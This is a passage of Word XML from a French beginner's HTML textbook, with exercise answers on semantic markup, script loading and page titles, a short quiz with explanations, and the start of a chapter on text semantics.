        <w:t>fréquentes, leurs conséquences concrètes et comment les corriger en une</w:t>
        <w:br/>
        <w:t xml:space="preserve">        minute."&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;meta property="og:type" content="article"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;meta property="og:title" content="Cinq erreurs de débutant en HTML"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;meta property="og:image" content="https://exemple.fr/img/erreurs-html.png"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;link rel="icon" href="favicon.svg" type="image/svg+xml"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;link rel="stylesheet" href="css/style.css"&gt;</w:t>
        <w:br/>
        <w:t>&lt;/head&gt;</w:t>
        <w:br/>
        <w:t>&lt;body&gt;...&lt;/body&gt;</w:t>
        <w:br/>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les longueurs indiquées ne sont pas des règles absolues : ce sont des seuils d'affichage. Un titre de 55 caractères reste lisible dans l'onglet et dans les résultats de recherche.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La validation doit être lancée après chaque modification importante. Corrigez d'abord les erreurs, puis examinez les avertissements : certains sont légitimes, comme l'usage de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur un rôle personnalisé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 3.2</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&lt;body&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;div class="top"&gt;&lt;div class="logo"&gt;Mon site&lt;/div&gt;&lt;/div&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;div class="menu"&gt;&lt;a href="/"&gt;Accueil&lt;/a&gt; &lt;a href="/blog"&gt;Blog&lt;/a&gt;&lt;/div&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;div class="content"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;div class="title"&gt;Bienvenue&lt;/div&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;div class="text"&gt;Un paragraphe.&lt;/div&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;div class="title2"&gt;Derniers articles&lt;/div&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/div&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;div class="bottom"&gt;© 2026&lt;/div&gt;</w:t>
        <w:br/>
        <w:t>&lt;/body&gt;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&lt;body&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;header&gt;&lt;p&gt;Mon site&lt;/p&gt;&lt;/header&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;nav aria-label="Navigation principale"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;a href="/"&gt;Accueil&lt;/a&gt; &lt;a href="/blog"&gt;Blog&lt;/a&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/nav&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;main&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;h1&gt;Bienvenue&lt;/h1&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;p&gt;Un paragraphe.&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;section&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;h2&gt;Derniers articles&lt;/h2&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/section&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/main&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;footer&gt;&lt;p&gt;© 2026&lt;/p&gt;&lt;/footer&gt;</w:t>
        <w:br/>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Chaque remplacement correspond à un rôle : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour l'identité, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>nav</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour les liens, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour le contenu unique, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>section</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour un bloc thématique titré, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>footer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour les mentions. Les </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> restantes seraient des conteneurs purement visuels, sans rôle documentaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 3.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La feuille de style apparaît avant le script et bloque le rendu ; la police est demandée après l'analyse du CSS ; le script bloque l'analyse jusqu'à son exécution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, le navigateur attend le téléchargement et l'exécution du script avant de poursuivre l'analyse du HTML. Le premier rendu est retardé d'autant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, le script se télécharge en parallèle et s'exécute après l'analyse. Avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>preload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur la police, la requête démarre plus tôt : le texte apparaît dans la bonne police plus rapidement, sans bloquer pour autant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 3.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les titres varient de 25 à 90 caractères. Les plus longs sont tronqués dans les résultats de recherche ; les plus courts perdent l'occasion de préciser le sujet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les sites médias privilégient le titre de l'article puis la marque ; les sites institutionnels placent souvent la marque en premier, ce qui est adapté à une recherche de notoriété.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bonne pratique fréquente : une description rédigée spécifiquement, différente du premier paragraphe. Erreur fréquente : la même description sur toutes les pages, ou l'absence d'image Open Graph.</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 xml:space="preserve">Quel est l'effet de l'absence de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;!doctype html&gt;</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Le navigateur refuse d'afficher la page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 mode quirks est activé et le calcul des tailles change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Les styles CSS sont ignorés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 document devient invalide pour les moteurs de recherche</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 xml:space="preserve">Où doit apparaître </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;meta charset="utf-8"&gt;</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N'importe où dans le document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Dans les 1024 premiers octets du fichier</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 xml:space="preserve">Après la balise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>title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 xml:space="preserve">Dans le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, avant le contenu</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 xml:space="preserve">Quelle affirmation sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est exacte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Le script s'exécute avant l'analyse du HTML</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 script s'exécute après l'analyse, dans l'ordre de déclaration</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 script s'exécute dès son téléchargement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 script ne s'exécute jamais</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 xml:space="preserve">Combien d'éléments </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> une page peut-elle contenir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 seul</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Deux au maximum</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Un par section</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Autant que nécessaire</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 xml:space="preserve">Pourquoi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>user-scalable=no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est-il déconseillé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Il ralentit le chargement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Il empêche l'agrandissement du texte et nuit à l'accessibilité</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Il bloque les images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Il rend le HTML invalide</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Sans doctype, les navigateurs basculent en mode quirks pour rester compatibles avec les pages anciennes : le modèle de boîte et certaines propriétés se comportent différemment.</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Le navigateur doit connaître l'encodage avant d'analyser le texte : la déclaration doit figurer très tôt dans l'en-tête.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> diffère l'exécution jusqu'à la fin de l'analyse du document et conserve l'ordre des scripts, contrairement à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4. A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> désigne le contenu principal unique du document. Plusieurs éléments </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> visibles rendraient la navigation par régions ambiguë.</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Le zoom est un mécanisme d'accessibilité essentiel pour les personnes malvoyantes ; le désactiver est contraire aux bonnes pratiques et aux critères d'accessibilité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>4. Texte, listes et sémantique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Choisir la balise juste : la compétence qui distingue un document solide d'une suite de paragraphes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 30 · Niveau : Débutant · Prérequis : chapitre 3</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Structurer un texte long avec titres, paragraphes et listes.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Distinguer les balises de sens des balises de présentation.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Employer correctement citations, abréviations, dates et code en ligne.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Maîtriser les caractères spéciaux et les entités HTML.</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Relire un document et justifier chaque choix de balise.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 Le texte avant la forme</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le contenu textuel représente l'essentiel d'une page web. Avant de penser taille, couleur ou graisse, il faut répondre à une question : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>quelle est la nature de ce fragment de texte ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Un titre, une liste, une citation, un terme technique, une date, une abréviation n'ont pas le même sens. HTML fournit une balise pour chacun.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cette rigueur n'est pas un exercice de style. Elle produit des documents exploitables par les moteurs de recherche, lisibles par les lecteurs d'écran, exportables vers d'autres formats et maintenables par d'autres développeurs. Un texte balisé avec soin se met en forme plus facilement qu'un texte anonyme.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2730500"/>
            <wp:docPr id="9" name="Picture 9"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f07.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2730500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.7 — Deux façons de baliser le même contenu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoteFigure"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>Les deux rendus peuvent être identiques ; seule la première version reste compréhensible par une machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 Titres et paragraphes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les six niveaux de titre forment un plan. Un document commence par un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, puis descend d'un niveau à la fois. Sauter un niveau est possible techniquement, mais brise la navigation assistée et brouille la structure logique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.11 — Titres, paragraphes et séparateurs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131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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="393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À éviter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1311"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>h1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
